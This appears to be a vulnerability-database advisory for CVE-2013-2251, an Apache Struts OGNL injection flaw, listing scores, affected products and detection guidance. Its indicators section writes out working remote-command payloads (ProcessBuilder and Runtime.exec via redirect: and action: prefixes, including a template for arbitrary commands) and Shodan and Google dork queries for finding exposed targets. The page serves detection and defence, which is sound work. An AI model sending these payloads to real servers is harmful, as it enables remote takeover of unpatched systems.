cbcvebase.
CVE-2013-2251
published 2013-07-20

CVE-2013-2251: Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
100.00%
100.0th percentile
Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

Affected

10 ranges
VendorProductVersion rangeFixed in
apachearchiva
apachearchiva
apachearchiva>= 1.3 < 1.3.81.3.8
apachestruts2.0.0 – 2.3.15
ciscoproducts
fujitsuinterstage_business_process_manager_analytics
fujitsuinterstage_business_process_manager_analytics
oraclesiebel_apps_e-billing
oraclesiebel_apps_e-billing
oraclesiebel_apps_e-billing

Detection & IOCsextracted from sources · hover to see the quote

url/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
url/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
url/index.action?redirect:%25{3*4}
url/struts2-showcase/employee/save.action?redirect:%25{3*4}
url/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
url/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
url/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
url?redirect:%25{new%20java.lang.String('proof')}
url?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('proof')}
commandredirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','<cmd>'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}
command%{#_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime().exec('your commands')}
command%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),@java.lang.Runtime@getRuntime().exec('your commands')}
path/struts2-blank/example/HelloWorld.action
yara
regex: ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)
  • Alert on HTTP responses with status 302 where the Location header reflects evaluated OGNL expression output (e.g., arithmetic results or file path strings), indicating successful OGNL injection via redirect: prefix.
  • Use Shodan queries to identify exposed Apache Struts instances as potential targets: search for 'http.html:"apache struts"', 'http.title:"struts2 showcase"', or 'http.html:"struts problem report"'.
  • Use Google dork 'ext:action | filetype:action' or 'intitle:"struts2 showcase"' to identify publicly exposed Struts 2 action endpoints.
  • Monitor HTTP responses for uid/gid output patterns matching the regex ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\) in the response body, indicating successful OS command execution via OGNL injection.
  • Flag HTTP requests to .action endpoints where query parameters contain URL-encoded OGNL constructs referencing 'ProcessBuilder', 'Runtime', 'getInputStream', or 'HttpServletResponse' — all hallmarks of this exploit's RCE payload.
  • Detect attempts to bypass static method access restrictions in OGNL by monitoring for '#_memberAccess' manipulation patterns in HTTP parameters, including both property-level ('allowStaticMethodAccess') and object-replacement techniques.
  • ·The 'action:' prefix can only be used for exploitation if wildcard mapping is enabled in the Struts 2 configuration; 'redirect:' and 'redirectAction:' are not constrained by configuration and are universally exploitable on DefaultActionMapper.
  • ·All Struts 2 applications using DefaultActionMapper are vulnerable regardless of whether the application was designed to accept prefixed parameters, because prefixed parameters forcefully override application behavior.
  • ·After upgrading to the patched version, 'redirect:' and 'redirectAction:' parameters are completely dropped and no longer functional, which may cause compatibility issues for applications relying on these features.
  • ·The static method access bypass via '#_memberAccess["allowStaticMethodAccess"]=true' was patched in Struts 2.3.14.2, but alternative techniques (reflection-based or object replacement) remain viable in later vulnerable versions up to 2.3.15.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_cisco10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.